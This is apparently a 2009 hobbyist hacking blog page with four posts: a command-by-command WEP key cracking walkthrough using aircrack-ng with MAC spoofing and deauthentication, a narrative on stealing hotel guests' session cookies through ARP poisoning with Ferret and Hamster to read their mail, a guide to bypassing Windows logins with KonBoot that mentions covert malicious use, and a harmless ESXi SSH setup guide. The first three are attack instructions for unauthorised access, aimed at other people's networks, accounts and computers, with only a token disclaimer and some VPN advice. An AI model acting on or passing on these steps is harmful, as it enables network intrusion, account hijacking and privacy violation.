WEP Cracking

Tuesday, June 30, 2009 by BBTUNA

The first thing we are going to do is install BackTrack 3 or 4 onto an SD card or flash drive or cd/dvd rom so we can boot from it without having to mess up the currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet.

After you have booted into BackTrack, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:

ifconfig wlan0 (yours may be different i.e. ath0 or rausb0) down

Next we want to change the MAC address of your wireless card to make things easier later and help you be more discreet:

macchanger --mac 00:11:22:33:44:55 wlan0

Next we want to bring it back up, but in monitor mode (this enables the card to capture packets without associating with the AccessPoint) :

airmon-ng start wlan0

You should see that a new interface called mon0 was created. That is the interface we are going to use for the rest of our cracking. Next:

airodump-ng mon0

This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don’t want to write them down, just open a new shell and leave that one open.

Now press

ctrl+c

to stop airodump-ng.

Open a new console (if you haven’t already) and type:

airodump-ng --channel x --bssid y -w filename mon0

Where x and y are the channel and bssid that you wrote down, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I’m searching through my cracked WEP files I know whats what.

Now leave that running and open another shell and type:

aireplay-ng --arpreplay -b [Access Point's MAC] -h 00:11:22:33:44:55 mon0

Now leave that running and open yet another shell, and type:

aireplay-ng --deauth 5 -c 00:11:22:33:44:55 -a [Access Point's MAC] mon0

Now in that same window type:

aircrack-ng filename*.cap

Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arise.

Posted in | 0 Comments »

Cain and Abel are with a Ferret and a Hamster

Friday, June 26, 2009 by BBTUNA
Well here we go again being curious..... Here is the scenario, I am in a hotel room that has free Wifi (wireless for all those that are not in the know) on a laptop that's running Windows XP (no Linux required for this one) and decide that nothing good can come from this. So I decide well I don't want to give out my MAC address but I'll use somebody elses. Why not? I scan the network using Zenmap because I'm using Windows XP; I'm going with the GUI. After getting a MAC address that I like oh 11:22:33:44:55 sounds good, I then change my MAC address using the MAC address changer (located online for free). Once that is ready I connect to the Internet, accept the agreement from the hotel room, and then receive an IP from the hotel. I'm in!

Now for the fun part. I fry up my Cain and Abel program and get to sniffing the network. Once you have pick up all targets, now its time to perform an ARP cache poison. You should now have a "man in the middle" established. Here is where the Ferret and the Hamster come into play. You start up your ferret program. Select your interface that you will be using (usually your wireless card) and now ferret should be receiving all those wonderful cookies. MMMMMM. Let it run for a while so that you may get as many cookies as possible. Now lets fire up Hamster (what this does is clone those cookies into pages). First start up a web browser and change the proxy settings to 127.0.0.1. Using a web interface you can access Hamster and select an IP, and choose a cookie/webpage (like Facebook) and be logged in as the user. Now if you wanted you could read that person's mail. Pretty scary huh. Makes you think you can't even pick you nose behind a laptop without someone recording it from you webcam (too bad its possible and will be covered in a different segment). AS A DISCLAIMER. You are by no means authorized to read other people's emails or in any way tamper with that person's property. Doing so will result in judicial punishment so be curious at your own risk.

Okay, so how do you protect yourself from such an attack. Well.....the best way to protect yourself from such attacks is to tunnel your traffic. Set up a VPN and log into you home network and surf the web. All of your traffic (cookies especially) will be encrypted and useless to the Hamster. There are a few ways of doing this like setting up a VPN connection through your router (like OpenVPN), another would be to set up VPN connection on a desktop/laptop at home to accept your incoming connection from your laptop, and the easiest way would be to download Teamviewer. Teamviewer comes with a built in VPN connection that allows you to just connect thru it to your home computer. Remember that just because its free internet doesn't mean its safe. Protect at all time.
Posted in | 0 Comments »

Bypassing local passwords on Windows

Friday, June 19, 2009 by BBTUNA
Here is the scenario, Joe the Admin just dropped a server from the domain to change the name for example and after the restart he tries to login only to find out he can't login. HMMMMM. Another scenario, grandma just bought a new laptop/PC and for whatever reason (AGE) can't remember her password and changing it. There are two ways of getting around this situation; one is using ophcrack w/ rainbow tables and try to crack the password which unless you have a great rainbow table and a strong processor on the PC might take quite a bit to crack.

Now for the best solution, use KonBoot. You still have to burn the ISO to a cd or write it to a USB drive and boot into the image like you would ophcrack but its how it works that is pretty amazing. What it does is it takes the Windows Kernel rewrites it and starts up Windows like it normally would. Only this time when you are prompted for a username and password just hit "enter" and thats it you are in. Here is the catch, you can not change the user password but can use it as if you were the user. It pretty much spoofs the users credentials and lets you go from there. This has been tested on all Windows version (XP - 7 & 2000 - 2008)

Now if you wanted to be malicious (ninja style) you could have this on a 1gb thumb drive and be able to access any PC simply by booting into the USB and there would be no trace of you ever being there.
Posted in | 0 Comments »

Enabling SSH on ESXi 3.5 or 4 (VSphere)

Friday, June 12, 2009 by BBTUNA
I ran into this issue last night as I was trying to transfer over files with WinSCP. First off, if you are familiar with ESXi, you know there is no service console by default and you are given the bare bones version of ESX unless you purchase the upgrade for ESXi. If you are using this for home use then ESXi (free) is more than enough. Personally I run ESXi 3.5 Update 4 (free) and for firewall issues I just have a VM running pfSense with no problems. If you ever want to transfer over files or VMDKs to a VMFS lun/disk you need to enable SSH to use WinSCP.

Here is how its done:
1. At the start up screen (Management Console) press ALT+F1 and a console screen will come up
2. Type unsupported (you will not see the text) and press Enter
3. You'll see "Technical Support Mode" and a prompt for a password; simply type in your root password
4. If everything is successful you will be given a shell "#"
5. Type in vi /etc/inetd.conf
6. The config file will come up on the screen and now just scroll down until you see "#SSH"
7. Press the "Insert" button on your keyboard and remove the # (This will uncomment the function)
8. Now press "ESC" button and type :wq (this will write and quit your editing session)
9. Now type in ps -a | grep inetd (this will find the process for inetd)
10. You should see the PID for "busybox"/"inetd" (the number will be different for everyone)
11. Type kill (and the PID number from the last step) and this will stop the inetd process
12. Type cd /etc
13. Type ./services.sh restart (this will restart the management services)
14. Now perform a clean reboot of your ESXi machine by typing ALT+F2 to get back to the management screen
15. Press F12 to shutdown/restart and restart (wait for you machine to come back up)
16. Now you should be able to log in with SSH (putty) and SCP (WinSCP)
Posted in | 0 Comments »

About Me